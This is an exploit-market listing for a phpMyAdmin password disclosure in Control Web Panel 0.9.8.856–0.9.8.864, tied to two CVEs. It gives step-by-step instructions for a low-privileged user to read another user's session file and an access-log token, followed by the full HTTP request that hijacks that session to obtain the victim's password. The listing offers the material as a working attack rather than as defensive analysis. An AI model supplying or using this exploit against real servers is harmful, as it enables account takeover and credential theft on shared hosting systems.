[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Control Web Panel 0.9.8.864 phpMyAdmin Password Disclosure Vulnerability

Author
Pongtorn Angsuchotmetee
Risk
[
Security Risk High
]
0day-ID
0day-ID-33664
Category
web applications
Date add
17-12-2019
CVE
CVE-2019-14782
CVE-2019-15235
Platform
php
Exploit Title       : CWP (Control Web Panel) phpMyAdmin password access
Exploit Author      : Pongtorn Angsuchotmetee, Nissana Sirijirakal, Narin Boonwasanarak
Vendor Homepage     : https://control-webpanel.com/
Software Link       : Not available, user panel only available for lastest version
Version             : 0.9.8.856 - 0.9.8.864 
Tested on           : CentOS 7.6.1810 (Core) FireFox 68.0.1 (64-bit)
CVE-Number          : CVE-2019-14782, CVE-2019-15235
Reference      : N/A

1. Login as an low privileged user
2. Get Session file name from path "/tmp" or /home/[USERNAME]/tmp/session/sess_xxxxxx"
3. Get token value from "/usr/local/cwpsrv/logs/access_log"
4. Make a request to obtain target password

GET /cwp_[token]/victim?module=pma HTTP/1.1
Host: 192.168.1.1:2083
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Connection: close
Referer: https://192.168.1.1:2083/
Cookie: PHPSESSID=[sess_xxxxxx]

#  0day.today [2024-12-24]  #